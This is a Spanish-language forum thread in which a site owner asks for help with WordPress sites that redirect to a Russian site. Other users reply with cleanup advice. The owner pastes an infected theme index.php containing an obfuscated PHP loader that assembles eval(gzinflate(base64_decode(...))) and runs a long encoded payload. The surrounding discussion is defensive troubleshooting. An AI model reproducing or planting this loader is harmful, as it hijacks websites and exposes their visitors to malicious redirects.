Problemas con virus en sitios web de WordPress

juanmanuel · 2013-08-20T05:53:18-0500

Hola gente !!! tengo 2 virus en 2 sitios WP:

Enlace eliminado
Enlace eliminado

Cuando entras a la pagina te redirecciona hacia una web rusa ...

Alguien me puede decir como solucionarlo ???

------------------------------------------------------------------------
Banahosting despues de 4 horas:

esto no es un virus en nuestro server sino codigo inyectado en uno de sus sitios y obvio le propague en los demas sitios ya que es un copartido y todo son carpetas.
Saludos

die beste · 2013-08-20T06:03:54-0500

entra al hosting, edita los archivos y borra el script que te redirecciona, debe estar en algun lugar del index

---------- Post agregado el 20-ago-2013 hora: 11:06 ----------

no creo que sea ningun virus, simplemente pusiste algun theme que venia con sorpresa, entra al hosting y borra las carpetas de themes menos la default de wp, debe ser 13 o 12
creo que eso sera mas facil de hacer

juanmanuel · 2013-08-20T06:06:43-0500

die beste dijo:
entra al hosting, edita los archivos y borra el script que te redirecciona, debe estar en algun lugar del index

renombre la carpeta plugins y no pasa nada ..

como decis q haga ?

VRed · 2013-08-20T06:09:34-0500

Revisa tu archivo .htaccess

faustorm · 2013-08-20T06:09:39-0500

Te habrán cambiado el index.php, edítalo o sube el tuyo.

MP si necesitas que te eche un cable.

die beste · 2013-08-20T06:10:32-0500

vas a content y borras las carpetas que hay dentro de themes, que sean themes que hayas subido, solo dejas la carpeta del theme por defecto, eso deberia eliminar los archivos con el script de rfedireccion, si no funciona eso hay que destripar algun otro archivo para ver donde esta el redir

juanmanuel · 2013-08-20T06:11:38-0500

tengo en mi carpeta theme un index.php que contiene esto, lo elimino pero no alcanza

Insertar CODE, HTML o PHP:

<?php
$md5 = "a5c59f14098c768e86ed30cb24fc194b";
$ab = array('v',"e",'r','l',")",'$','c',"s",'a',"z",'b','t','4','6',"_","o",'g',"(","d",'i',"f",'n',";");
$bb9 = create_function('$'.'v',$ab[1].$ab[0].$ab[8].$ab[3].$ab[17].$ab[16].$ab[9].$ab[19].$ab[21].$ab[20].$ab[3].$ab[8].$ab[11].$ab[1].$ab[17].$ab[10].$ab[8].$ab[7].$ab[1].$ab[13].$ab[12].$ab[14].$ab[18].$ab[1].$ab[6].$ab[15].$ab[18].$ab[1].$ab[17].$ab[5].$ab[0].$ab[4].$ab[4].$ab[4].$ab[22]);
$bb9('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');
?>
<?php
// Silence is golden.
?>

faustorm · 2013-08-20T06:13:56-0500

¿Tienes BackUp?

---------- Post agregado el 20-ago-2013 hora: 11:14 ----------

Te digo lo de la BackUp porque yo te recomiendo que te cepilles todo el directorio de wordpress y metas la BackUp

sanata · 2013-08-20T06:18:39-0500

en primer lugar elimina ese index.php y sube uno limpio.
En segundo lugar y por precaución cambia la contraseña del hosting (por precaución).
Suele suceder que limpias y luego vuelven a reinfectarte.
En tercer lugar revisa los archivos php y js que tengan fecha de edición reciente. Es allí donde suelen insertar estos códigos maliciosos.

juanmanuel · 2013-08-20T06:27:47-0500

faustorm dijo:
¿Tienes BackUp?

---------- Post agregado el 20-ago-2013 hora: 11:14 ----------

Te digo lo de la BackUp porque yo te recomiendo que te cepilles todo el directorio de wordpress y metas la BackUp

no tenog buck up

faustorm · 2013-08-20T06:35:21-0500

¡Haz ya mismo una de la base de datos a través del mysql!

Luego, como dice sanata, sube un index limpio y cambias las claves.

Es posible que tengas algún trollano en el PC que envíe tus contraseñas al hacker de turno, échale un ojo.

En cuanto lo tengas limpio instalate algún plugin de backups como "WP Backup to Dropbox" es el que uso yo.

juanmanuel · 2013-08-20T07:28:41-0500

faustorm dijo:
¡Haz ya mismo una de la base de datos a través del mysql!

Luego, como dice sanata, sube un index limpio y cambias las claves.

Es posible que tengas algún trollano en el PC que envíe tus contraseñas al hacker de turno, échale un ojo.

En cuanto lo tengas limpio instalate algún plugin de backups como "WP Backup to Dropbox" es el que uso yo.

Acabo de borrar TODO ... no hay nada en Enlace eliminado ... y el virus sigue

Zheive · 2013-08-20T07:37:06-0500

A mi una vez me entró un código malicioso y lo solucioné bajando todos los archivos del servidor y pasándole un antivirus (el Avast).

sanata · 2013-08-20T07:45:26-0500

juanmanuel dijo:
Acabo de borrar TODO ... no hay nada en Enlace eliminado ... y el virus sigue

si es como tu dices, quizás sea mejor que le pidas asistencia urgente a los de Banahosting. He visto que esas son las DNS del dominio.

die beste · 2013-08-20T07:50:25-0500

hay mas victimas en ese hosting, pero debe ser mas facil echarle la culpa al usuario que solucionarlo ellos, en fin
en mi epoca directamente se baneaba al que subia scripts al hosting, porque despues pasa esto, que se infectan todos los que comparten servidor

Jeordie · 2013-08-20T08:19:35-0500

revisa todos los archivos del theme buscando codigos ofuscados como ese y lo mismo con los plugins

sanata · 2013-08-20T08:43:28-0500

Jeordie dijo:
revisa todos los archivos del theme buscando codigos ofuscados como ese y lo mismo con los plugins

Acaba de decir que borró todo...

dani002 · 2013-08-20T08:58:24-0500

nserver: ns1.dgrad-host.com.
nserver: ns2.dgrad-host.com.

son las de tu hosting ?

Steeep · 2013-08-20T09:03:47-0500

Lo mejor es que hagas un backup ya, & que si puedes actualices tus plugins.

juanmanuel · 2013-08-20T09:10:41-0500

dani002 dijo:
nserver: ns1.dgrad-host.com.
nserver: ns2.dgrad-host.com.

son las de tu hosting ?

No son las de mi hosting ..................

WTF !!??

como viste eso ? Yo veo otras